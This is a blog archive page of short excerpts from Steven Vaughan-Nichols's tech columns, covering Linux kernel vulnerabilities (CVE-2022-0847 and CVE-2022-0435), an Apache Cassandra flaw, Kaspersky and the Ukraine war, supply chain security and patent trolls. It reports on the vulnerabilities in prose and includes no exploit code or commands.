May 13, 2022
by sjvn01
0 comments
Open-source software supply chain security is now a vital issue of national security. Written by Steven Vaughan-Nichols, Senior Contributing Editor Steven Vaughan-Nichols Senior Contributing Editor Steven J. Vaughan-Nichols, aka sjvn, has been…Read More
March 18, 2022
by sjvn01
0 comments
Companies and governments have, shall we say, interesting relations. Just ask any Chinese tech company in recent days. But, while they’re losing billions, companies in war-mongering countries like Russia have an even harder row to hoe. How can Russian companies support Russia’s unprovoked invasion of Ukraine?
You may say they can’t, but that just shows you haven’t studied history. When money and ethics are weighed against each other, money usually wins. For example, such American-as-apple-pie-and-baseball companies as General Motors, Ford, Coca-Cola, and IBM supported Nazi Germany during World War II.
Really. Look it up.
So, there’s nothing too surprising when we see Moscow-based security leader Kaspersky founder Eugene Kaspersky trying to tiptoe his way around Russia’s invasion of Ukraine on Twitter: “We welcome the start of negotiations to resolve the current situation in Ukraine and hope that they will lead to a cessation of hostilities and a compromise.”
March 8, 2022
by sjvn01
0 comments
As I write this, there’s already a nasty exploit out there using the latest Linux kernel vulnerability, Dirty Pipeline, for any J. Random Luser to overwrite root’s password field in /etc/passwd. The experts at LWN.net called it a “disconcerting kernel vulnerability.” I call it a “shoot me now” security problem.
But let’s not do that, shall we? Here’s the 411 on Dirty Pipeline, aka CVE-2022-0847. Web host sysadmin and programmer Max Kellermann found the security hole back in 2021, but he wasn’t at first sure what was going on. After a lot of blood, sweat, tears, and research Kellermann tracked down the problem to changes in the Linux kernel that became critical in Linux 5.8. With this update, Kellermann wrote, “it became possible to overwrite data in the page cache, simply by writing new data into the pipe prepared in a special way.”
OK, that’s bad. But there’s much worse to come. Kellermann found that “To make this vulnerability more interesting, it not only works without write permissions, it also works with immutable files, on read-only btrfs snapshots and on read-only mounts (including CD-ROM mounts). That is because the page cache is always writable (by the kernel), and writing to a pipe never checks any permissions.”
Oh My God.
March 7, 2022
by sjvn01
0 comments
Patent trolls, aka Patent Assertion Entities (PAE)s, have plagued open-source software for ages. Over the years though, other groups have risen up to keep them from stealing from the companies and organizations that actually use patents’ intellectual property (IP). One such group, Unified Patents, an international organization of over 200 businesses, has been winning for the last two years. This is their story to date.
February 21, 2022
by sjvn01
0 comments
Here we go again. Another obnoxious security bug, CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel was found by Appgate senior exploit developer Samuel Page while he was poking around at a Linux heap overflow security bug, CVE-2021-43267 from November 2021. Page’s discovery is a remotely and locally reachable stack overflow in the Linux kernel’s Transparent Inter-Process Communication (TIPC) protocol networking module.
Nasty Linux Kernel Stack Overflow Flaw Found and Patched. More>
February 18, 2022
by sjvn01
0 comments
It’s always something when it comes to security. This time around the JFrog’s Security Research team has found a remote code execution (RCE) issue in Apache Cassandra, the popular open source NoSQL database. And, oh joy, of course with this RCE, you can stop Cassandra in its tracks. Since companies such as Netflix, Twitter, Reddit, and hundreds of others rely on Cassandra to be running every moment of the day, this is not good news.